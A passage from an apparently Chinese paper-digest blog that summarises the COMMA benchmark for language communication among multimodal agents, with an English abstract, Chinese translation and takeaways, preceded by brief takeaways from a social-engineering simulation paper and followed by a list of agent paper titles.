SE攻击机制包括攻击者如何利用漏洞和受害者的人格特质影响他们的易感性。
提出LLM代理框架SE-VSim，模拟多轮对话中的SE攻击机制。
使用超过1000个模拟对话的数据集进行实证研究。
识别了攻击场景，其中对手假装多种身份以获取敏感信息。

Cool Papers

点此查看论文截图

COMMA: A Communicative Multimodal Multi-Agent Benchmark

Authors:Timothy Ossowski, Jixuan Chen, Danyal Maqbool, Zefan Cai, Tyler Bradshaw, Junjie Hu

The rapid advances of multimodal agents built on large foundation models have largely overlooked their potential for language-based communication between agents in collaborative tasks. This oversight presents a critical gap in understanding their effectiveness in real-world deployments, particularly when communicating with humans. Existing agentic benchmarks fail to address key aspects of inter-agent communication and collaboration, particularly in scenarios where agents have unequal access to information and must work together to achieve tasks beyond the scope of individual capabilities. To fill this gap, we introduce COMMA: a novel puzzle benchmark designed to evaluate the collaborative performance of multimodal multi-agent systems through language communication. Our benchmark features a variety of multimodal puzzles, providing a comprehensive evaluation across four key categories of agentic capability in a communicative collaboration setting. Our findings reveal surprising weaknesses in state-of-the-art models, including strong proprietary models like GPT-4o and reasoning models like o4-mini. Many chain of thought reasoning models such as R1-Onevision and LLaVA-CoT struggle to outperform even a random baseline in agent-agent collaboration, indicating a potential growth area in their communication abilities.

基于大型基础模型的多模态代理的快速进步在很大程度上忽视了它们在协作任务中基于语言的代理间通信的潜力。这一疏忽导致在理解其在现实世界部署中的有效性时存在重大空白，特别是在与人类通信时。现有的代理基准测试未能解决代理间通信和协作的关键方面，特别是在代理对信息访问不均等且必须协同工作以完成任务超出个人能力的场景中。为了填补这一空白，我们引入了COMMA：一种新型的谜题基准测试，旨在通过语言沟通来评估多模态多代理系统的协作性能。我们的基准测试包含各种多模态谜题，在沟通协作环境中全面评估了四种关键代理能力。我们的研究结果揭示了最先进模型的令人惊讶的弱点，包括强大的专有模型如GPT-4o和推理模型如o4-mini。许多思维链推理模型，如R1-Onevision和LLaVA-CoT在代理之间的协作中难以超越随机基线，这表明其沟通能力有潜在的提升空间。

论文及项目相关链接

PDF

Summary

随着基于大型基础模型的多模态代理的快速发展，它们在协作任务中基于语言的代理间通信潜力却被忽视。这一忽视在理解其在现实部署中的有效性时存在关键空白，尤其是在与人类的通信时。现有代理基准测试未能解决代理间通信和协作的关键方面，特别是在代理在信息获取上存在不平等且必须合作才能完成超出单个能力范围的任务的场景中。为填补这一空白，我们推出了COMMA基准测试，旨在通过语言沟通评估多模态多代理系统的协作性能。我们的基准测试包含各种多模态谜题，在沟通协作环境中全面评估了四种关键代理能力。我们的研究发现，包括GPT-4o等强大专有模型和o4-mini等推理模型在内的最新模型存在令人惊讶的弱点。许多像R1-Onevision和LLaVA-CoT这样的思维链模型在代理协作中表现不佳，这显示出其在通信能力方面的潜在增长领域。

Key Takeaways

多模态代理在协作任务中的语言通信潜力被忽视。
现有代理基准测试未能充分评估代理间通信和协作的关键方面。
COMMA基准测试被引入，以评估多模态多代理系统通过语言沟通进行协作的能力。
COMMA包含多种多模态谜题，旨在全面评估四种关键代理能力。
最新模型，包括GPT-4o和某些推理模型，在代理协作方面存在弱点。
思维链模型在代理协作中的表现不佳，显示出通信能力的潜在增长领域。
多模态代理系统的通信能力对于其在现实世界的部署和有效性至关重要。

Cool Papers

点此查看论文截图

Kedreamix

https://kedreamix.github.io/Talk2Paper/Paper/2025-09-11/Agent/

本博客所有文章除特別声明外，均采用 CC BY 4.0 许可协议。转载请注明来源 Kedreamix !

Agent

Few-Shot

Few-Shot 方向最新论文已更新，请持续关注 Update in 2025-09-11 Object-level Correlation for Few-Shot Segmentation

2025-09-11 Few-Shot

Few-Shot

LLM

LLM 方向最新论文已更新，请持续关注 Update in 2025-09-11 Parallel-R1 Towards Parallel Thinking via Reinforcement Learning

2025-09-11 LLM

LLM

Agent

2025-09-11 更新

AgentSentinel: An End-to-End and Real-Time Security Defense Framework for Computer-Use Agents

CAViAR: Critic-Augmented Video Agentic Reasoning

AgentX: Towards Orchestrating Robust Agentic Workflow Patterns with FaaS-hosted MCP Services

Towards Generalized Routing: Model and Agent Orchestration for Adaptive and Efficient Inference

VeriOS: Query-Driven Proactive Human-Agent-GUI Interaction for Trustworthy OS Agents

T-araVLN: Translator for Agricultural Robotic Agents on Vision-and-Language Navigation

SFR-DeepResearch: Towards Effective Reinforcement Learning for Autonomously Reasoning Single Agents

EvoEmo: Towards Evolved Emotional Policies for LLM Agents in Multi-Turn Negotiation

AI-SearchPlanner: Modular Agentic Search via Pareto-Optimal Multi-Objective Reinforcement Learning

Personalized Attacks of Social Engineering in Multi-turn Conversations: LLM Agents for Simulation and Detection

COMMA: A Communicative Multimodal Multi-Agent Benchmark